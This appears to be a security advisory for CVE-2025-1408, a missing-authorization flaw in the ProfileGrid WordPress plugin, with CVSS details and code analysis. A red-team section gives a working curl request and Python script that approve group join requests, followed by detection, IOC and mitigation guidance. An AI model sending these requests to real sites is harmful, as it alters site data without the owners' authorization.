CVE-2025-1408
Executive Summary
CVE-2025-1408 is a Missing Authorization vulnerability in the ProfileGrid – User Profiles, Groups and Communities plugin for WordPress. The flaw resides in the pm_decline_join_group_request and pm_approve_join_group_request AJAX functions, which lack a proper capability check. This allows any authenticated user with Subscriber-level access or higher to approve or decline group join requests—a privilege that should be restricted to administrators. The vulnerability has a CVSS score of 4.3 (Medium) and affects all versions up to and including 5.9.4.4. No public exploit code or proof-of-concept has been released, and the patch status remains unknown.

WordPress Ecosystem Impact
This vulnerability is specific to the WordPress plugin ecosystem. It does not affect Apache, Nginx, or any other web server software. The attack surface is limited to WordPress sites running the vulnerable ProfileGrid plugin.
Supply Chain & Package Security
The ProfileGrid plugin is distributed via the official WordPress plugin repository. Users who installed the plugin directly from the WordPress dashboard or via manual upload are affected. No supply chain compromise has been reported, but the lack of a patch increases the risk of future exploitation.
CVSS Breakdown & Threat Level
- Attack Vector (AV): Network (N) – The attack is performed remotely over the network.
- Attack Complexity (AC): Low (L) – No special conditions are required; the attacker only needs to be authenticated.
- Privileges Required (PR): Low (L) – Subscriber-level access is sufficient.
- User Interaction (UI): None (N) – No user interaction is needed.
- Scope (S): Unchanged (U) – The vulnerability does not affect other components.
- Confidentiality (C): None (N) – No data exposure.
- Integrity (I): Low (L) – The attacker can modify group membership data.
- Availability (A): None (N) – No denial-of-service impact.
Threat Level: Medium. While the CVSS score is 4.3, the ease of exploitation (low privileges, no user interaction) and the potential for privilege escalation within the group context elevate the risk for WordPress sites with untrusted subscriber accounts.
Deep Dive & Mechanics
The ProfileGrid plugin registers AJAX actions for handling group join requests. The functions pm_decline_join_group_request and pm_approve_join_group_request are hooked to WordPress AJAX actions. The vulnerability arises because these functions do not verify that the current user has administrative capabilities (e.g., manage_options or pm_group_admin). Instead, they only check if the user is logged in.
Affected Code Path (simplified):
add_action('wp_ajax_pm_approve_join_group_request', 'pm_approve_join_group_request');
function pm_approve_join_group_request() {
// Missing capability check
$group_id = intval($_POST['group_id']);
$user_id = intval($_POST['user_id']);
// ... approve logic ...
}
An attacker with Subscriber-level access can craft a POST request to /wp-admin/admin-ajax.php with the action parameter set to pm_approve_join_group_request or pm_decline_join_group_request, along with the required group_id and user_id parameters. This allows them to manipulate group membership without authorization.
Vulnerable vs. Patched Code
Vulnerable Code (<= 5.9.4.4):
// No capability check before processing
function pm_approve_join_group_request() {
$group_id = intval($_POST['group_id']);
$user_id = intval($_POST['user_id']);
// ... approve logic ...
}
Patched Code (Hypothetical):
function pm_approve_join_group_request() {
// Add capability check
if (!current_user_can('pm_group_admin') && !current_user_can('manage_options')) {
wp_die('Unauthorized', 403);
}
$group_id = intval($_POST['group_id']);
$user_id = intval($_POST['user_id']);
// ... approve logic ...
}
The patch would add a current_user_can() check to ensure only users with the appropriate group admin or site admin capabilities can execute these functions.
Exploitation & Lab Setup
Red Team (Attack Simulation)
Prerequisites:
- A WordPress site with ProfileGrid plugin version <= 5.9.4.4.
- A valid subscriber account (username:
attacker, password:attacker123).
Step 1: Obtain a valid nonce (if required) Some AJAX actions may require a nonce. The attacker can extract it from the page source or use a plugin like "User Switching" to get the nonce from a legitimate admin session.
Step 2: Craft the exploit request
curl -X POST 'http://target.com/wp-admin/admin-ajax.php' \
-d 'action=pm_approve_join_group_request&group_id=1&user_id=2' \
--cookie 'wordpress_logged_in_...=...'
Step 3: Verify The attacker can check the group members list to confirm the user was added.
Automated Exploit (Python):
import requests
target = "http://target.com/wp-admin/admin-ajax.php"
cookies = {"wordpress_logged_in_hash": "your_cookie"}
data = {
"action": "pm_approve_join_group_request",
"group_id": "1",
"user_id": "2"
}
r = requests.post(target, data=data, cookies=cookies)
print(r.text)
Blue Team (Defense & Detection)
Detection:
- Monitor AJAX requests to
admin-ajax.phpwith action parameterspm_approve_join_group_requestorpm_decline_join_group_requestfrom non-admin users. - Look for rapid succession of such requests from a single IP.
Mitigation:
- Apply the vendor patch as soon as it becomes available.
- As a temporary workaround, add a custom capability check via a WordPress plugin or code snippet:
add_action('wp_ajax_pm_approve_join_group_request', 'custom_pm_approve_check', 1);
function custom_pm_approve_check() {
if (!current_user_can('manage_options')) {
wp_die('Unauthorized', 403);
}
}
Indicators of Compromise (IOCs)
- Network: POST requests to
/wp-admin/admin-ajax.phpwithaction=pm_approve_join_group_requestoraction=pm_decline_join_group_requestfrom low-privilege users. - Logs: WordPress debug log entries showing
pm_approve_join_group_requestcalled by subscriber-level users. - File: Presence of unexpected users in group membership tables (e.g.,
wp_pm_group_members).

Remediation & Mitigation
- Immediate Action: Disable the ProfileGrid plugin until a patch is available.
- Workaround: Implement a custom capability check as described in the Blue Team section.
- Patch: Monitor the WordPress plugin repository for an update. Apply version 5.9.4.5 or higher once released.
- User Audit: Review all subscriber accounts and remove any that are not trusted.
- Logging: Enable WordPress debug logging to capture unauthorized AJAX requests.
